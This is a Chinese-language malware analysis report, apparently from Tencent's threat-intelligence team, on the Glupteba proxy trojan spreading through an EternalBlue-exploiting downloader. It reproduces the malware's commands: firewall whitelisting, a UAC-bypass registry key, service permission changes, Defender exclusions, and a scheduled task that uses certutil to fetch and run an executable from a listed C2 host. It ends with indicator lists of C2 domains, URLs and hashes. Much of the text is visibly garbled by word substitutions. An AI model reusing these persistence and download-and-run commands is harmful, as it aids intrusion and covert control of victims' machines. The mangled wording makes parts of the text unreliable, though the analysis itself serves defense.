快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

Glupteba恶意代办署理木马行使“永恒之蓝”漏洞传播,感染量激增

0×1 概述

近日腾讯御见威胁情报中心监测到大批下载Glupteba恶意代办署理木马。不同以往的是,工控黑客 ,该恶意木马并未通过Operation Windigo僵尸收集进行传播,而是通过其他的木马下载器(Scheduled.exe)进行传播。进一步溯源阐发发现,该木马下载器行使“永恒之蓝”漏洞进行传播,从而导致了该木马的感染量的激增。

Glupteba木马会绕过UAC,以治理员权限以及体系权限运行,会创建防火墙策略,将木马程序加入白名单;修改Windows Defender策略,将木马程序添加到病毒查杀白名单。木马会网络中毒电脑的隐衷信息,行使中毒电脑挖矿。

0×2 具体阐发

Scheduled.exe阐发:

scheduled.exe起首申请空间,开释PE文件执行。将开释的PE dump出来,发现是golang编写的,行使IDA python脚本将函数重命名。开释的PE起首执行写入设置信息到注册表HEKY_CURRENT_USER/Software/Microsoft/TestApp中。

1.png

写入设置信息

然后判定是不是治理员权限,要是否是,则行使写注册表  

"HKCU\Software\Classes\mscfile\shell\open\co妹妹and"

然后通过启动CompMgmtLauncher绕过UAC以治理员权限重新启动本人。

2.png

3.png

运行CompMgmtLauncher

重启后再判定是不是体系权限,要是否是则通过以TrustedInstaller运行本人提高权限。

4.png

以TrustedInstaller运行

判定本人路径名是不是”C:\Windows\rss\csrss.exe”,要是否是则执行装置逻辑。

起首会判定是否在捏造机中运行。

5.png

检查VirtualBox

然后添加防火墙策略,并配置注册表设置firewall键值为1,将程序启动加入Windows防火墙的白名单。

cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"

创建其他开释文件相干目录,并写入注册表

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\”的paths以及processs下的子健。并且配置注册表设置defender键值为1。

6.png

创建目录文件夹

最后将自身挪移到”C:\Windows\rss\”下,重命名”csrss.exe”,配置文件夹隐躲,并配置注册表Software\Microsoft\Windows\CurrentVersion\RUN,最后重新启动csrss.exe。

7.png

配置自启

重启后再向服务器注册bot将服务器返归数据再写入注册表设置UUID(后续下载的CloudNet启动需要)。

8.png

注册bot

注册bot实现后创建两个义务分别用于执行本人以及更新本人。

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/scheduled.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

然后再开释3个sys文件以及1个exe文件到目标目录配置隐躲属性,并加载驱动以及exe。”C:\Windows\System32\drivers\”下开释三个隐躲sys文件:

Winmon.sys用于隐躲对应PID进程。

WinmonFS.sys隐躲指定文件或目录。

WinmonProcessMonitor.sys查找指定进程,并关闭。

9.png

WinmonFS.sys隐躲文件

C:\Windows\下开释一个exe文件:

Windefender.exe

添加规则到windows defender。

cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

cmd.exe /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

cmd.exe /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

添加完规则后,会将服务器返归cloudnet.exe下载地址”http[:]//skynetstop.com/cloudnet.exe”写入到注册表设置信息中的CloudenetSource中,然后开启6个线程。

10.png

创建线程

6个线程分别作用是:

1.监测服务更新

2.监测维护CloudNet

3.监测维护Defender

4.下载矿机以及挖矿代办署理设置信息

5.监测全屏窗口时则下载其他软件装置

6.获取掩码行使永恒之蓝攻击局域网机器

11.png

第三方软件下载器

12.png

下载窃取阅读器小我私人数据插件

13.png

矿机

14.png

永恒之蓝payload模块下载app.exe

开启线程后,再守候服务器指令,执行其他功能,例如上传下载执行等功能。

15.png

部分功能函数

Windefender.exe阐发:

windefender.exe一样是由golang编写,起首将本人写入windows defender规则。

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

然后获取注册表设置信息CloudenetSource,去下载执行Cloudnet.exe。

16.png

下载Cloudnet.exe

Cloudnet阐发:

起首读取注册表设置信息中的UUID并校检。

17.png

读取UUID

挪移本人到目的文件夹下。

18.png

挪移自身

写注册表自启动后继续在注册表

“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本信息,路径等信息。

19.png

配置自启

配置注册表完后,会走访www.google.com判定是否联网,随后在从100条硬编码中随机选择一条并解密生成拼接成c2服务器。向该c2服务器发送信息。

20.png

第一次发送信息

随后会继续向c2服务器发送更具体的内陆信息。

21.png

第二次发送内陆信息

随后服务器会向受害机器发送验证通讯信息。

22.png

bot与C2认证

e为服务器向受害者机器发送的控制指令。

23.png

接收指令执行

24.png

0×3 关联阐发

阐发发现,cloudnet.exe原来是Glupteba恶意木马,Glupteba恶意木马作为Operation Windigo构造用于部署僵尸收集中的一部分首次出现,Operation Windigo构造通过Glupteba创建代办署理分发垃圾邮件。

此次发现的Glupteba虽然功能没有太大变迁,然则与以往通过Operation Windigo基础举措措施分发下载不同,而是行使其他恶意木马进行分发下载,并且作为主模块使用,我们有理由信赖Glupteba离开Operation Windigo,成为本人僵尸收集的一部分。

观察过程中目前还没有发现Glupteba有其他动作,不排除僵尸收集违后的操纵者出售公开代办署理服务,可用于垃圾邮件分发或者收集攻击等举动。

25.png

0×4 解决方案

腾讯御见威胁情报中心提醒用户注意下列几点:

一、服务器关闭无须要的端口,要领可参考:https://guanjia.qq.com/web_clinic/s8/585.html

2、推荐企业用户装置御点终端安全治理体系(https://s.tencent.com/product/yd/index.html)。御点终端安全治理体系具备终端杀毒统一管控、修复漏洞统一管控,和策略管控等全方位的安全治理功能,可帮助企业治理者周全了解、治理企业内网安全状况、维护企业安全。

000.png

IOC

C2:

https[:]//blumbergnew.com

https[:]//fastandcoolest.com

https[:]//mihan14500.com

https[:]//lentanewsland.com

http[:]//skynetstop.com

http[:]//gb1.wupdomain.com

http[:]//dp.fastandcoolest.com

http[:]//F0AE5A04-264A-432E-BC59-2DEDBC05E96E.server-3.0df.ru

http[:]//e8ebf79d-5dd2-4d98-9c45-e3231e8cc26c.server-17.0m1.ru

URL:

http[:]//dp.fastandcoolest.com/app/4/app.exe

http[:]//dp.fastandcoolest.com/scheduled.exe

http[:]//gb1.wupdomain.com/xme64-252.exe

http[:]//dp.fastandcoolest.com/deps.zip

http[:]//dp.fastandcoolest.com/app/3/app.exe

http[:]//dp.fastandcoolest.com/app.exe

http[:]//gb1.wupdomain.com/xme32-252-gcc.exe

http[:]//dp.fastandcoolest.com/thirdparty/lsa64install.exe

http[:]//dp.fastandcoolest.com/scheduled/3/scheduled.exe

http[:]//dp.fastandcoolest.com/ps.exe

http[:]//dp.fastandcoolest.com/mrt.exe

http[:]//dp.fastandcoolest.com/vc.exe

MD5:

4ef0c39e632279d7b3672d2efc071e5b

0d3a8d67cd969c6e096b4d29e910dd9e

622fd523a87cb55be0b676a70c64e8f8

c626f99579c00a2e86b89c566eb1487a

0acbe358eac81eca5e05ac1ca6f9484a

954f2536b9c314ab0e98543445c1c9da

ad51151ac0ce51c2f96f40eec6f13f70

3eda353ae833e9c79a5c01c40505892b

e3ab3302877551b0211641798a8f17a1

611601b4bab6794ffab44877ce5a3555

b4c4c660f3479e6149aafa46634b210e

ed82b0352481bdb870a2feef7094f767

057994209bbde8a07786bcb5cf02cedf

580e347d6422565d5ac412980ca00bd1

de5b3710b5cbdef975216f6043727a36

a9bf973249a76b214b38a5483544709f

2262802fadaf196687d35cd787092b14

b9e69cfdc4ee4bff6169c8a2dc062750

您可能还会对下面的文章感兴趣: